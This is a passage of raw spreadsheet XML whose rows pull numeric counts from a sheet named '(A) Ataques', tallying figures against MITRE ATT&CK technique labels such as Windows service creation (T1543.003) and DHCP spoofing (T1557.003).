        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CF83,"")</f>
        <v>5109</v>
      </c>
      <c r="AF83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CH83,"")</f>
        <v>41</v>
      </c>
      <c r="AG83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CJ83,"")</f>
        <v>31</v>
      </c>
      <c r="AH83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CK83,"")</f>
        <v>8</v>
      </c>
      <c r="AI83" s="287">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($AE83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ83" s="292">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CL83,"")</f>
        <v>0</v>
      </c>
      <c r="AK83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CN83,"")</f>
        <v>0</v>
      </c>
      <c r="AL83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CP83,"")</f>
        <v>0</v>
      </c>
      <c r="AM83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CQ83,"")</f>
        <v>0</v>
      </c>
      <c r="AN83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($AJ83=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CR83,"")</f>
        <v>8</v>
      </c>
      <c r="AP83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CT83,"")</f>
        <v>5</v>
      </c>
      <c r="AQ83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CV83,"")</f>
        <v>4</v>
      </c>
      <c r="AR83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$CW83,"")</f>
        <v>4</v>
      </c>
      <c r="AS83" s="287">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($AO83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT83" s="288">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!CX83,"")</f>
        <v>120</v>
      </c>
      <c r="AU83" s="392">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!CZ83,"")</f>
        <v>14</v>
      </c>
      <c r="AV83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!DB83,"")</f>
        <v>12</v>
      </c>
      <c r="AW83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!DC83,"")</f>
        <v>4</v>
      </c>
      <c r="AX83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($AT83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY83" s="469">
        <f>'(A) Ataques'!LU83+'(A) Ataques'!MA83+'(A) Ataques'!MG83+'(A) Ataques'!MM83+'(A) Ataques'!MS83</f>
        <v>3</v>
      </c>
      <c r="AZ83" s="510">
        <f>'(A) Ataques'!LW83+'(A) Ataques'!MC83+'(A) Ataques'!MI83+'(A) Ataques'!MO83+'(A) Ataques'!MU83</f>
        <v>2</v>
      </c>
      <c r="BA83" s="471">
        <f>'(A) Ataques'!LY83+'(A) Ataques'!ME83+'(A) Ataques'!MK83+'(A) Ataques'!MQ83+'(A) Ataques'!MW83</f>
        <v>1</v>
      </c>
      <c r="BB83" s="471">
        <f>'(A) Ataques'!LQ83</f>
        <v>2</v>
      </c>
      <c r="BC83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($AY83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD83" s="469">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!LL83,"")</f>
        <v>8</v>
      </c>
      <c r="BE83" s="510">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!LM83,"")</f>
        <v>7</v>
      </c>
      <c r="BF83" s="471">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!LN83,"")</f>
        <v>1</v>
      </c>
      <c r="BG83" s="471">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!LO83,"")</f>
        <v>4</v>
      </c>
      <c r="BH83" s="471">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!LS83,"")</f>
        <v>5</v>
      </c>
      <c r="BI83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($BD83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ83" s="469">
        <f>'(A) Ataques'!OL83+'(A) Ataques'!OR83+'(A) Ataques'!OX83+'(A) Ataques'!PD83+'(A) Ataques'!PJ83</f>
        <v>2</v>
      </c>
      <c r="BK83" s="510">
        <f>'(A) Ataques'!ON83+'(A) Ataques'!OT83+'(A) Ataques'!OZ83+'(A) Ataques'!PF83+'(A) Ataques'!PL83</f>
        <v>2</v>
      </c>
      <c r="BL83" s="471">
        <f>'(A) Ataques'!OP83+'(A) Ataques'!OV83+'(A) Ataques'!PB83+'(A) Ataques'!PH83+'(A) Ataques'!PN83</f>
        <v>1</v>
      </c>
      <c r="BM83" s="495">
        <f>'(A) Ataques'!OH83</f>
        <v>2</v>
      </c>
      <c r="BN83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($BJ83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO83" s="469">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!OC83,"")</f>
        <v>2</v>
      </c>
      <c r="BP83" s="510">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!OD83,"")</f>
        <v>2</v>
      </c>
      <c r="BQ83" s="471">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!OE83,"")</f>
        <v>1</v>
      </c>
      <c r="BR83" s="471">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!OF83,"")</f>
        <v>1</v>
      </c>
      <c r="BS83" s="471">
        <f>IF('(A) Ataques'!$AP83&lt;&gt;"NO",'(A) Ataques'!OJ83,"")</f>
        <v>2</v>
      </c>
      <c r="BT83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($BO83=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="84" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A84" s="79">
        <f t="shared" si="1"/>
        <v>82</v>
      </c>
      <c r="B84" s="4">
        <f>IF('(A) Ataques'!AK84&lt;&gt;"NO",'(A) Ataques'!E84,"")</f>
        <v>53</v>
      </c>
      <c r="C84" s="6" t="str">
        <f>IF('(A) Ataques'!AK84&lt;&gt;"NO",IF('(A) Ataques'!M84="","",'(A) Ataques'!M84),"")</f>
        <v>T1543.003-CreateSystemProcessWindowsService</v>
      </c>
      <c r="D84" s="4" t="str">
        <f>IF('(A) Ataques'!AK84&lt;&gt;"NO",'(A) Ataques'!F84,"")</f>
        <v>T1543</v>
      </c>
      <c r="E84" s="286">
        <f>IF('(A) Ataques'!AK84&lt;&gt;"NO",'(A) Ataques'!AQ84,"")</f>
        <v>3</v>
      </c>
      <c r="F84" s="288">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!BB84,"")</f>
        <v>16</v>
      </c>
      <c r="G84" s="392">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!BD84,"")</f>
        <v>6</v>
      </c>
      <c r="H84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!BF84,"")</f>
        <v>3</v>
      </c>
      <c r="I84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!BG84,"")</f>
        <v>2</v>
      </c>
      <c r="J84" s="530">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($F84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BH84,"")</f>
        <v>8</v>
      </c>
      <c r="L84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BJ84,"")</f>
        <v>6</v>
      </c>
      <c r="M84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BL84,"")</f>
        <v>3</v>
      </c>
      <c r="N84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BM84,"")</f>
        <v>2</v>
      </c>
      <c r="O84" s="532">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($K84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P84" s="292">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BN84,"")</f>
        <v>24</v>
      </c>
      <c r="Q84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BP84,"")</f>
        <v>12</v>
      </c>
      <c r="R84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BR84,"")</f>
        <v>6</v>
      </c>
      <c r="S84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BS84,"")</f>
        <v>2</v>
      </c>
      <c r="T84" s="530">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($P84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BT84,"")</f>
        <v>23</v>
      </c>
      <c r="V84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BV84,"")</f>
        <v>11</v>
      </c>
      <c r="W84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BX84,"")</f>
        <v>6</v>
      </c>
      <c r="X84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$BY84,"")</f>
        <v>3</v>
      </c>
      <c r="Y84" s="532">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($U84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z84" s="288">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!BZ84,"")</f>
        <v>16</v>
      </c>
      <c r="AA84" s="392">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!CB84,"")</f>
        <v>10</v>
      </c>
      <c r="AB84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!CD84,"")</f>
        <v>6</v>
      </c>
      <c r="AC84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!CE84,"")</f>
        <v>2</v>
      </c>
      <c r="AD84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF(Z84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CF84,"")</f>
        <v>39</v>
      </c>
      <c r="AF84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CH84,"")</f>
        <v>21</v>
      </c>
      <c r="AG84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CJ84,"")</f>
        <v>12</v>
      </c>
      <c r="AH84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CK84,"")</f>
        <v>3</v>
      </c>
      <c r="AI84" s="287">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($AE84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ84" s="292">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CL84,"")</f>
        <v>0</v>
      </c>
      <c r="AK84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CN84,"")</f>
        <v>0</v>
      </c>
      <c r="AL84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CP84,"")</f>
        <v>0</v>
      </c>
      <c r="AM84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CQ84,"")</f>
        <v>0</v>
      </c>
      <c r="AN84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($AJ84=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CR84,"")</f>
        <v>0</v>
      </c>
      <c r="AP84" s="322">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CT84,"")</f>
        <v>0</v>
      </c>
      <c r="AQ84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CV84,"")</f>
        <v>0</v>
      </c>
      <c r="AR84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!$CW84,"")</f>
        <v>0</v>
      </c>
      <c r="AS84" s="287">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($AO84=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT84" s="288">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!CX84,"")</f>
        <v>24</v>
      </c>
      <c r="AU84" s="392">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!CZ84,"")</f>
        <v>12</v>
      </c>
      <c r="AV84" s="4">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!DB84,"")</f>
        <v>6</v>
      </c>
      <c r="AW84" s="20">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",'(A) Ataques'!DC84,"")</f>
        <v>2</v>
      </c>
      <c r="AX84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($AT84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY84" s="469">
        <f>'(A) Ataques'!LU84+'(A) Ataques'!MA84+'(A) Ataques'!MG84+'(A) Ataques'!MM84+'(A) Ataques'!MS84</f>
        <v>5</v>
      </c>
      <c r="AZ84" s="510">
        <f>'(A) Ataques'!LW84+'(A) Ataques'!MC84+'(A) Ataques'!MI84+'(A) Ataques'!MO84+'(A) Ataques'!MU84</f>
        <v>3</v>
      </c>
      <c r="BA84" s="471">
        <f>'(A) Ataques'!LY84+'(A) Ataques'!ME84+'(A) Ataques'!MK84+'(A) Ataques'!MQ84+'(A) Ataques'!MW84</f>
        <v>2</v>
      </c>
      <c r="BB84" s="471">
        <f>'(A) Ataques'!LQ84</f>
        <v>2</v>
      </c>
      <c r="BC84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($AY84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD84" s="469">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!LL84,"")</f>
        <v>6</v>
      </c>
      <c r="BE84" s="510">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!LM84,"")</f>
        <v>4</v>
      </c>
      <c r="BF84" s="471">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!LN84,"")</f>
        <v>2</v>
      </c>
      <c r="BG84" s="471">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!LO84,"")</f>
        <v>1</v>
      </c>
      <c r="BH84" s="471">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!LS84,"")</f>
        <v>3</v>
      </c>
      <c r="BI84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($BD84=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ84" s="469">
        <f>'(A) Ataques'!OL84+'(A) Ataques'!OR84+'(A) Ataques'!OX84+'(A) Ataques'!PD84+'(A) Ataques'!PJ84</f>
        <v>0</v>
      </c>
      <c r="BK84" s="510">
        <f>'(A) Ataques'!ON84+'(A) Ataques'!OT84+'(A) Ataques'!OZ84+'(A) Ataques'!PF84+'(A) Ataques'!PL84</f>
        <v>0</v>
      </c>
      <c r="BL84" s="471">
        <f>'(A) Ataques'!OP84+'(A) Ataques'!OV84+'(A) Ataques'!PB84+'(A) Ataques'!PH84+'(A) Ataques'!PN84</f>
        <v>0</v>
      </c>
      <c r="BM84" s="495">
        <f>'(A) Ataques'!OH84</f>
        <v>0</v>
      </c>
      <c r="BN84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($BJ84=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO84" s="469">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!OC84,"")</f>
        <v>0</v>
      </c>
      <c r="BP84" s="510">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!OD84,"")</f>
        <v>0</v>
      </c>
      <c r="BQ84" s="471">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!OE84,"")</f>
        <v>0</v>
      </c>
      <c r="BR84" s="471">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!OF84,"")</f>
        <v>0</v>
      </c>
      <c r="BS84" s="471">
        <f>IF('(A) Ataques'!$AP84&lt;&gt;"NO",'(A) Ataques'!OJ84,"")</f>
        <v>0</v>
      </c>
      <c r="BT84" s="331">
        <f>IF('(A) Ataques'!$AK84&lt;&gt;"NO",IF($BO84=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A85" s="79">
        <f t="shared" si="1"/>
        <v>83</v>
      </c>
      <c r="B85" s="4">
        <f>IF('(A) Ataques'!AK85&lt;&gt;"NO",'(A) Ataques'!E85,"")</f>
        <v>54</v>
      </c>
      <c r="C85" s="6" t="str">
        <f>IF('(A) Ataques'!AK85&lt;&gt;"NO",IF('(A) Ataques'!M85="","",'(A) Ataques'!M85),"")</f>
        <v>T1557.003-Dhcp_spoofing</v>
      </c>
      <c r="D85" s="4" t="str">
        <f>IF('(A) Ataques'!AK85&lt;&gt;"NO",'(A) Ataques'!F85,"")</f>
        <v>T1557</v>
      </c>
      <c r="E85" s="286">
        <f>IF('(A) Ataques'!AK85&lt;&gt;"NO",'(A) Ataques'!AQ85,"")</f>
        <v>5</v>
      </c>
      <c r="F85" s="288">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!BB85,"")</f>
        <v>0</v>
      </c>
      <c r="G85" s="392">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!BD85,"")</f>
        <v>0</v>
      </c>
      <c r="H85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!BF85,"")</f>
        <v>0</v>
      </c>
      <c r="I85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!BG85,"")</f>
        <v>0</v>
      </c>
      <c r="J85" s="530">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($F85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BH85,"")</f>
        <v>0</v>
      </c>
      <c r="L85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BJ85,"")</f>
        <v>0</v>
      </c>
      <c r="M85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BL85,"")</f>
        <v>0</v>
      </c>
      <c r="N85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BM85,"")</f>
        <v>0</v>
      </c>
      <c r="O85" s="532">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($K85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P85" s="292">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BN85,"")</f>
        <v>0</v>
      </c>
      <c r="Q85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BP85,"")</f>
        <v>0</v>
      </c>
      <c r="R85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BR85,"")</f>
        <v>0</v>
      </c>
      <c r="S85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BS85,"")</f>
        <v>0</v>
      </c>
      <c r="T85" s="530">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($P85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BT85,"")</f>
        <v>2</v>
      </c>
      <c r="V85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BV85,"")</f>
        <v>1</v>
      </c>
      <c r="W85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BX85,"")</f>
        <v>1</v>
      </c>
      <c r="X85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$BY85,"")</f>
        <v>1</v>
      </c>
      <c r="Y85" s="532">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($U85=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z85" s="288">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!BZ85,"")</f>
        <v>70</v>
      </c>
      <c r="AA85" s="392">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!CB85,"")</f>
        <v>3</v>
      </c>
      <c r="AB85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!CD85,"")</f>
        <v>3</v>
      </c>
      <c r="AC85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!CE85,"")</f>
        <v>2</v>
      </c>
      <c r="AD85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF(Z85=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CF85,"")</f>
        <v>72</v>
      </c>
      <c r="AF85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CH85,"")</f>
        <v>4</v>
      </c>
      <c r="AG85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CJ85,"")</f>
        <v>4</v>
      </c>
      <c r="AH85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CK85,"")</f>
        <v>2</v>
      </c>
      <c r="AI85" s="287">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($AE85=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ85" s="292">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CL85,"")</f>
        <v>0</v>
      </c>
      <c r="AK85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CN85,"")</f>
        <v>0</v>
      </c>
      <c r="AL85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CP85,"")</f>
        <v>0</v>
      </c>
      <c r="AM85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CQ85,"")</f>
        <v>0</v>
      </c>
      <c r="AN85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($AJ85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CR85,"")</f>
        <v>0</v>
      </c>
      <c r="AP85" s="322">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CT85,"")</f>
        <v>0</v>
      </c>
      <c r="AQ85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CV85,"")</f>
        <v>0</v>
      </c>
      <c r="AR85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!$CW85,"")</f>
        <v>0</v>
      </c>
      <c r="AS85" s="287">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($AO85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT85" s="288">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!CX85,"")</f>
        <v>0</v>
      </c>
      <c r="AU85" s="392">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!CZ85,"")</f>
        <v>0</v>
      </c>
      <c r="AV85" s="4">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!DB85,"")</f>
        <v>0</v>
      </c>
      <c r="AW85" s="20">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",'(A) Ataques'!DC85,"")</f>
        <v>0</v>
      </c>
      <c r="AX85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($AT85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY85" s="469">
        <f>'(A) Ataques'!LU85+'(A) Ataques'!MA85+'(A) Ataques'!MG85+'(A) Ataques'!MM85+'(A) Ataques'!MS85</f>
        <v>0</v>
      </c>
      <c r="AZ85" s="510">
        <f>'(A) Ataques'!LW85+'(A) Ataques'!MC85+'(A) Ataques'!MI85+'(A) Ataques'!MO85+'(A) Ataques'!MU85</f>
        <v>0</v>
      </c>
      <c r="BA85" s="471">
        <f>'(A) Ataques'!LY85+'(A) Ataques'!ME85+'(A) Ataques'!MK85+'(A) Ataques'!MQ85+'(A) Ataques'!MW85</f>
        <v>0</v>
      </c>
      <c r="BB85" s="471">
        <f>'(A) Ataques'!LQ85</f>
        <v>0</v>
      </c>
      <c r="BC85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($AY85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD85" s="469">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!LL85,"")</f>
        <v>6</v>
      </c>
      <c r="BE85" s="510">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!LM85,"")</f>
        <v>6</v>
      </c>
      <c r="BF85" s="471">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!LN85,"")</f>
        <v>0</v>
      </c>
      <c r="BG85" s="471">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!LO85,"")</f>
        <v>4</v>
      </c>
      <c r="BH85" s="471">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!LS85,"")</f>
        <v>5</v>
      </c>
      <c r="BI85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($BD85=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ85" s="469">
        <f>'(A) Ataques'!OL85+'(A) Ataques'!OR85+'(A) Ataques'!OX85+'(A) Ataques'!PD85+'(A) Ataques'!PJ85</f>
        <v>0</v>
      </c>
      <c r="BK85" s="510">
        <f>'(A) Ataques'!ON85+'(A) Ataques'!OT85+'(A) Ataques'!OZ85+'(A) Ataques'!PF85+'(A) Ataques'!PL85</f>
        <v>0</v>
      </c>
      <c r="BL85" s="471">
        <f>'(A) Ataques'!OP85+'(A) Ataques'!OV85+'(A) Ataques'!PB85+'(A) Ataques'!PH85+'(A) Ataques'!PN85</f>
        <v>0</v>
      </c>
      <c r="BM85" s="495">
        <f>'(A) Ataques'!OH85</f>
        <v>0</v>
      </c>
      <c r="BN85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($BJ85=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO85" s="469">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!OC85,"")</f>
        <v>0</v>
      </c>
      <c r="BP85" s="510">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!OD85,"")</f>
        <v>0</v>
      </c>
      <c r="BQ85" s="471">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!OE85,"")</f>
